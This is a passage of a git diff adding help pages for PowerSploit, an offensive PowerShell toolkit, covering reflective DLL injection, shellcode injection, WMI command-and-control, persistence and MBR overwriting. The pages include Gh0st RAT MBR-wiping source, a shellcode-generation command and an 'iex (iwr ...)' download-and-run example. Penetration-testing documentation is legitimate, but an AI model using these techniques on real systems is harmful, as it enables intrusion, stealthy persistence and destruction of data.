String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FuncReturnType +Optional, the return type of the function being called in the DLL. +Default: Void + Options: String, WString, Void. +See notes for more information. + IMPORTANT: For DLLs being loaded remotely, only Void is supported. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: Void +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExeArgs +Optional, arguments to pass to the executable being reflectively loaded. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ProcId +Optional, the process ID of the remote process to inject the DLL in to. +If not injecting in to remote process, ignore this. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ProcName +Optional, the name of the remote process to inject the DLL in to. +If not injecting in to remote process, ignore this. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ForceASLR +Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. +Some PE's will work with ASLR even + if the compiler flags don't indicate they support it. +Other PE's will simply crash. +Make sure to test this prior to using. +Has no effect when + loading in to a remote process. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DoNotZeroMZ +Optional, will not wipe the MZ from the first two bytes of the PE. +This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +GENERAL NOTES: +The script has 3 basic sets of functionality: +1.) Reflectively load a DLL in to the PowerShell process + -Can return DLL output to user when run remotely or locally. + -Cleans up memory in the PS process once the DLL finishes executing. + -Great for running pentest tools on remote computers without triggering process monitoring alerts. + -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info. +2.) Reflectively load an EXE in to the PowerShell process. + -Can NOT return EXE output to user when run remotely. +If remote output is needed, you must use a DLL. +CAN return EXE output if run locally. + -Cleans up memory in the PS process once the DLL finishes executing. + -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts. +3.) Reflectively inject a DLL in to a remote process. + -Can NOT return DLL output to the user when run remotely OR locally. + -Does NOT clean up memory in the remote process if/when DLL finishes execution. + -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. + -Expects the DLL to have this function: void VoidFunc(). +This is the function that will be called after the DLL is loaded. + +DLL LOADING NOTES: + +PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. +If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL +return a char* or wchar_t*, which PowerShell can take and read the output from. +Anything output from stdout which is run using powershell +remoting will not be returned to you. +If you just run the PowerShell script locally, you WILL be able to see the stdout output from +applications because it will just appear in the console window. +The limitation only applies when using PowerShell remoting. + +For DLL Loading: +Once this script loads the DLL, it calls a function in the DLL. +There is a section near the bottom labeled "YOUR CODE GOES HERE" +I recommend your DLL take no parameters. +I have prewritten code to handle functions which take no parameters are return +the following types: char*, wchar_t*, and void. +If the function returns char* or wchar_t* the script will output the +returned data. +The FuncReturnType parameter can be used to specify which return type to use. +The mapping is as follows: +wchar_t* : FuncReturnType = WString +char* : FuncReturnType = String +void : Default, don't supply a FuncReturnType + +For the whcar_t* and char_t* options to work, you must allocate the string to the heap. +Don't simply convert a string +using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns. + +The function name expected in the DLL for the prewritten FuncReturnType's is as follows: +WString : WStringFunc +String : StringFunc +Void : VoidFunc + +These function names ARE case sensitive. +To create an exported DLL function for the wstring type, the function would +be declared as follows: +extern "C" __declspec( dllexport ) wchar_t* WStringFunc() + + +If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify +this script to accomodate this. +You can find the code to modify in the section labeled "YOUR CODE GOES HERE". + +Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection + +## RELATED LINKS + +[http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ + +Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ +Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/](http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ + +Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ +Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/) + diff --git a/docs/CodeExecution/Invoke-Shellcode.md b/docs/CodeExecution/Invoke-Shellcode.md new file mode 100755 index 00000000..7240a4c2 --- /dev/null +++ b/docs/CodeExecution/Invoke-Shellcode.md @@ -0,0 +1,116 @@ +# Invoke-Shellcode + +## SYNOPSIS +Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. + +PowerSploit Function: Invoke-Shellcode +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-Shellcode [-ProcessID ] [-Shellcode ] [-Force] +``` + +## DESCRIPTION +Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre + +PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. +To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk): + +msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/\[";\]//g;s/\\\\/,0/g' | tr -d '\n' | cut -c2- + +Make sure to specify 'thread' for your exit process. +Also, don't bother encoding your shellcode. +It's entirely unnecessary. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-Shellcode -ProcessId 4274 +``` + +Description +----------- +Inject shellcode into process ID 4274. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-Shellcode +``` + +Description +----------- +Inject shellcode into the running instance of PowerShell. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) +``` + +Description +----------- +Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) +Warning: This script has no way to validate that your shellcode is 32 vs. +64-bit! + +## PARAMETERS + +### -ProcessID +Process ID of the process you want to inject shellcode into. + +```yaml +Type: UInt16 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Shellcode +Specifies an optional shellcode passed in as a byte array + +```yaml +Type: Byte[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Force +Injects shellcode without prompting for confirmation. +By default, Invoke-Shellcode prompts for confirmation before performing any malicious act. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/CodeExecution/Invoke-WmiCommand.md b/docs/CodeExecution/Invoke-WmiCommand.md new file mode 100755 index 00000000..23e7d9e1 --- /dev/null +++ b/docs/CodeExecution/Invoke-WmiCommand.md @@ -0,0 +1,311 @@ +# Invoke-WmiCommand + +## SYNOPSIS +Executes a PowerShell ScriptBlock on a target computer using WMI as a +pure C2 channel. + +Author: Matthew Graeber +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-WmiCommand [-Payload] [[-RegistryHive] ] [[-RegistryKeyPath] ] + [[-RegistryPayloadValueName] ] [[-RegistryResultValueName] ] [[-ComputerName] ] + [[-Credential] ] [[-Impersonation] ] + [[-Authentication] ] [-EnableAllPrivileges] [[-Authority] ] +``` + +## DESCRIPTION +Invoke-WmiCommand executes a PowerShell ScriptBlock on a target +computer using WMI as a pure C2 channel. +It does this by using the +StdRegProv WMI registry provider methods to store a payload into a +registry value. +The command is then executed on the victim system and +the output is stored in another registry value that is then retrieved +remotely. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Hosts = Get-Content hostnames.txt +``` + +PS C:\\\>$Payload = Get-Content payload.ps1 +PS C:\\\>$Credential = Get-Credential 'TargetDomain\TargetUser' +PS C:\\\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$Payload = Get-Content payload.ps1 +``` + +PS C:\\\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2' + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\Administrator' -Verbose +``` + +## PARAMETERS + +### -Payload +Specifies the payload to be executed on the remote system. + +```yaml +Type: ScriptBlock +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RegistryHive +{{Fill RegistryHive Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: HKEY_CURRENT_USER +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RegistryKeyPath +Specifies the registry key where the payload and payload output will +be stored. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: SOFTWARE\Microsoft\Cryptography\RNG +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RegistryPayloadValueName +Specifies the registry value name where the payload will be stored. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: Seed +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RegistryResultValueName +Specifies the registry value name where the payload output will be +stored. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: Value +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerName +Runs the command on the specified computers. +The default is the local +computer. + +Type the NetBIOS name, an IP address, or a fully qualified domain +name of one or more computers. +To specify the local computer, type +the computer name, a dot (.), or "localhost". + +This parameter does not rely on Windows PowerShell remoting. +You can +use the ComputerName parameter even if your computer is not +configured to run remote commands. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Cn + +Required: False +Position: 6 +Default value: Localhost +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +Specifies a user account that has permission to perform this action. +The default is the current user. +Type a user name, such as "User01", +"Domain01\User01", or User@Contoso.com. +Or, enter a PSCredential +object, such as an object that is returned by the Get-Credential +cmdlet. +When you type a user name, you will be prompted for a +password. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Impersonation +Specifies the impersonation level to use. +Valid values are: + +0: Default (Reads the local registry for the default impersonation level, which is usually set to "3: Impersonate".) + +1: Anonymous (Hides the credentials of the caller.) + +2: Identify (Allows objects to query the credentials of the caller.) + +3: Impersonate (Allows objects to use the credentials of the caller.) + +4: Delegate (Allows objects to permit other objects to use the credentials of the caller.) + +```yaml +Type: ImpersonationLevel +Parameter Sets: (All) +Aliases: +Accepted values: Default, Anonymous, Identify, Impersonate, Delegate + +Required: False +Position: 8 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Authentication +Specifies the authentication level to be used with the WMI connection. +Valid values are: + +-1: Unchanged + +0: Default + +1: None (No authentication in performed.) + +2: Connect (Authentication is performed only when the client establishes a relationship with the application.) + +3: Call (Authentication is performed only at the beginning of each call when the application receives the request.) + +4: Packet (Authentication is performed on all the data that is received from the client.) + +5: PacketIntegrity (All the data that is transferred between the client and the application is authenticated and verified.) + +6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.) + +```yaml +Type: AuthenticationLevel +Parameter Sets: (All) +Aliases: +Accepted values: Default, None, Connect, Call, Packet, PacketIntegrity, PacketPrivacy, Unchanged + +Required: False +Position: 9 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -EnableAllPrivileges +Enables all the privileges of the current user before the command +makes the WMI call. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Authority +Specifies the authority to use to authenticate the WMI connection. +You can specify standard NTLM or Kerberos authentication. +To use +NTLM, set the authority setting to ntlmdomain:\, where +\ identifies a valid NTLM domain name. +To use Kerberos, +specify kerberos:\. +You cannot include the +authority setting when you connect to the local computer. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 10 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### System.String[] + +Accepts one or more host names/IP addresses over the pipeline. + +## OUTPUTS + +### System.Management.Automation.PSObject + +Outputs a custom object consisting of the target computer name and +the output of the command executed. + +## NOTES +In order to receive the output from your payload, it must return +actual objects. +For example, Write-Host doesn't return objects +rather, it writes directly to the console. +If you're using +Write-Host in your scripts though, you probably don't deserve to get +the output of your payload back. +:P + +## RELATED LINKS + diff --git a/docs/Mayhem/Set-CriticalProcess.md b/docs/Mayhem/Set-CriticalProcess.md new file mode 100755 index 00000000..1ec952f2 --- /dev/null +++ b/docs/Mayhem/Set-CriticalProcess.md @@ -0,0 +1,108 @@ +# Set-CriticalProcess + +## SYNOPSIS +Causes your machine to blue screen upon exiting PowerShell. + +PowerSploit Function: Set-CriticalProcess +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-CriticalProcess +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Set-CriticalProcess -ExitImmediately +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Set-CriticalProcess -Force -Verbose +``` + +## PARAMETERS + +### -Force +Set the running PowerShell process as critical without asking for confirmation. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExitImmediately +Immediately exit PowerShell after successfully marking the process as critical. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -WhatIf +Shows what would happen if the cmdlet runs. +The cmdlet is not run. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: wi + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Confirm +Prompts you for confirmation before running the cmdlet. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: cf + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Mayhem/Set-MasterBootRecord.md b/docs/Mayhem/Set-MasterBootRecord.md new file mode 100755 index 00000000..0aa994d5 --- /dev/null +++ b/docs/Mayhem/Set-MasterBootRecord.md @@ -0,0 +1,184 @@ +# Set-MasterBootRecord + +## SYNOPSIS +Proof of concept code that overwrites the master boot record with the +message of your choice. + +PowerSploit Function: Set-MasterBootRecord +Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Set-MasterBootRecord [[-BootMessage] ] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm] +``` + +## DESCRIPTION +Set-MasterBootRecord is proof of concept code designed to show that it is +possible with PowerShell to overwrite the MBR. +This technique was taken +from a public malware sample. +This script is inteded solely as proof of +concept code. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC' +``` + +## PARAMETERS + +### -BootMessage +Specifies the message that will be displayed upon making your computer a brick. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: Stop-Crying; Get-NewHardDrive +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RebootImmediately +Reboot the machine immediately upon overwriting the MBR. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Force +Suppress the warning prompt. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -WhatIf +Shows what would happen if the cmdlet runs. +The cmdlet is not run. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: wi + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Confirm +Prompts you for confirmation before running the cmdlet. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: cf + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +Obviously, this will only work if you have a master boot record to +overwrite. +This won't work if you have a GPT (GUID partition table). + +This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us): + +// CGh0stApp message handlers + +unsigned char scode\[\] = +"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" +"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" +"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; + +int CGh0stApp::KillMBR() +{ + HANDLE hDevice; + DWORD dwBytesWritten, dwBytesReturned; + BYTE pMBR\[512\] = {0}; + + // ????MBR + memcpy(pMBR, scode, sizeof(scode) - 1); + pMBR\[510\] = 0x55; + pMBR\[511\] = 0xAA; + + hDevice = CreateFile + ( + "\\\\\\\\.\\\\PHYSICALDRIVE0", + GENERIC_READ | GENERIC_WRITE, + FILE_SHARE_READ | FILE_SHARE_WRITE, + NULL, + OPEN_EXISTING, + 0, + NULL + ); + if (hDevice == INVALID_HANDLE_VALUE) + return -1; + DeviceIoControl + ( + hDevice, + FSCTL_LOCK_VOLUME, + NULL, + 0, + NULL, + 0, + &dwBytesReturned, + NUL + ) + // ?????? + WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); + DeviceIoControl + ( + hDevice, + FSCTL_UNLOCK_VOLUME, + NULL, + 0, + NULL, + 0, + &dwBytesReturned, + NULL + ); + CloseHandle(hDevice); + + ExitProcess(-1); + return 0; +} + +## RELATED LINKS + diff --git a/docs/Persistence/Add-Persistence.md b/docs/Persistence/Add-Persistence.md new file mode 100755 index 00000000..bdd14fb1 --- /dev/null +++ b/docs/Persistence/Add-Persistence.md @@ -0,0 +1,227 @@ +# Add-Persistence + +## SYNOPSIS +Add persistence capabilities to a script. + +PowerSploit Function: Add-Persistence +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption +Optional Dependencies: None + +## SYNTAX + +### ScriptBlock +``` +Add-Persistence -ScriptBlock -ElevatedPersistenceOption -UserPersistenceOption + [-PersistenceScriptName ] [-PersistentScriptFilePath ] [-RemovalScriptFilePath ] + [-DoNotPersistImmediately] [-PassThru] +``` + +### FilePath +``` +Add-Persistence -FilePath -ElevatedPersistenceOption -UserPersistenceOption + [-PersistenceScriptName ] [-PersistentScriptFilePath ] [-RemovalScriptFilePath ] + [-DoNotPersistImmediately] [-PassThru] +``` + +## DESCRIPTION +Add-Persistence will add persistence capabilities to any script or scriptblock. +This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' +``` + +$UserOptions = New-UserPersistenceOption -Registry -AtLogon +Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose + +Description +----------- +Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. +elevated) determined at runtime. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } +``` + +$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle +$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle +Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 + +Description +----------- +Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. +elevated) determined at runtime. +The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. +The final, encoded output is finally saved to .\EncodedPersistentScript.ps1 + +## PARAMETERS + +### -ScriptBlock +Specifies a scriptblock containing your payload. + +```yaml +Type: ScriptBlock +Parameter Sets: ScriptBlock +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -FilePath +Specifies the path to your payload. + +```yaml +Type: String +Parameter Sets: FilePath +Aliases: Path + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ElevatedPersistenceOption +Specifies the trigger for the persistent payload if the target is running elevated. +You must run New-ElevatedPersistenceOption to generate this argument. + +```yaml +Type: Object +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserPersistenceOption +Specifies the trigger for the persistent payload if the target is not running elevated. +You must run New-UserPersistenceOption to generate this argument. + +```yaml +Type: Object +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PersistenceScriptName +Specifies the name of the function that will wrap the original payload. +The default value is 'Update-Windows'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Update-Windows +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PersistentScriptFilePath +Specifies the path where you would like to output the persistence script. +By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: "$PWD\Persistence.ps1" +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RemovalScriptFilePath +Specifies the path where you would like to output a script that will remove the persistent payload. +By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: "$PWD\RemovePersistence.ps1" +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DoNotPersistImmediately +Output only the wrapper function for the original payload. +By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. +it will end with 'Update-Windows -Persist'). +If you are in a position where you are running in memory but want to persist at a later time, use this option. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PassThru +Outputs the contents of the persistent script to the pipeline. +This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### None + +Add-Persistence cannot receive any input from the pipeline. + +## OUTPUTS + +### System.Management.Automation.ScriptBlock + +If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script. + +## NOTES +When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine. + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/Persistence/Get-SecurityPackage.md b/docs/Persistence/Get-SecurityPackage.md new file mode 100755 index 00000000..2a0cdef4 --- /dev/null +++ b/docs/Persistence/Get-SecurityPackage.md @@ -0,0 +1,37 @@ +# Get-SecurityPackage + +## SYNOPSIS +Enumerates all loaded security packages (SSPs). + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Get-SecurityPackage +``` + +## DESCRIPTION +Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages. +It also parses the returned SecPkgInfo struct array. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-SecurityPackage +``` + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Persistence/Install-SSP.md b/docs/Persistence/Install-SSP.md new file mode 100755 index 00000000..99193c04 --- /dev/null +++ b/docs/Persistence/Install-SSP.md @@ -0,0 +1,60 @@ +# Install-SSP + +## SYNOPSIS +Installs a security support provider (SSP) dll. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Install-SSP [[-Path] ] +``` + +## DESCRIPTION +Install-SSP installs an SSP dll. +Installation involves copying the dll to +%windir%\System32 and adding the name of the dll to +HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Install-SSP -Path .\mimilib.dll +``` + +## PARAMETERS + +### -Path +{{Fill Path Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +The SSP dll must match the OS architecture. +i.e. +You must have a 64-bit SSP dll +if you are running a 64-bit OS. +In order for the SSP dll to be loaded properly +into lsass, the dll must export SpLsaModeInitialize. + +## RELATED LINKS + diff --git a/docs/Persistence/New-ElevatedPersistenceOption.md b/docs/Persistence/New-ElevatedPersistenceOption.md new file mode 100755 index 00000000..efe215d8 --- /dev/null +++ b/docs/Persistence/New-ElevatedPersistenceOption.md @@ -0,0 +1,235 @@ +# New-ElevatedPersistenceOption + +## SYNOPSIS +Configure elevated persistence options for the Add-Persistence function. + +PowerSploit Function: New-ElevatedPersistenceOption +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### PermanentWMIAtStartup +``` +New-ElevatedPersistenceOption [-PermanentWMI] [-AtStartup] +``` + +### PermanentWMIDaily +``` +New-ElevatedPersistenceOption [-PermanentWMI] [-Daily] -At +``` + +### ScheduledTaskOnIdle +``` +New-ElevatedPersistenceOption [-ScheduledTask] [-OnIdle] +``` + +### ScheduledTaskAtLogon +``` +New-ElevatedPersistenceOption [-ScheduledTask] [-AtLogon] +``` + +### ScheduledTaskHourly +``` +New-ElevatedPersistenceOption [-ScheduledTask] [-Hourly] +``` + +### ScheduledTaskDaily +``` +New-ElevatedPersistenceOption [-ScheduledTask] [-Daily] -At +``` + +### Registry +``` +New-ElevatedPersistenceOption [-Registry] [-AtLogon] +``` + +## DESCRIPTION +New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. +The output of this function is a required parameter of Add-Persistence. +Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle +``` + +## PARAMETERS + +### -PermanentWMI +Persist via a permanent WMI event subscription. +This option will be the most difficult to detect and remove. + +Detection Difficulty: Difficult +Removal Difficulty: Difficult +User Detectable? +No + +```yaml +Type: SwitchParameter +Parameter Sets: PermanentWMIAtStartup, PermanentWMIDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ScheduledTask +Persist via a scheduled task. + +Detection Difficulty: Moderate +Removal Difficulty: Moderate +User Detectable? +No + +```yaml +Type: 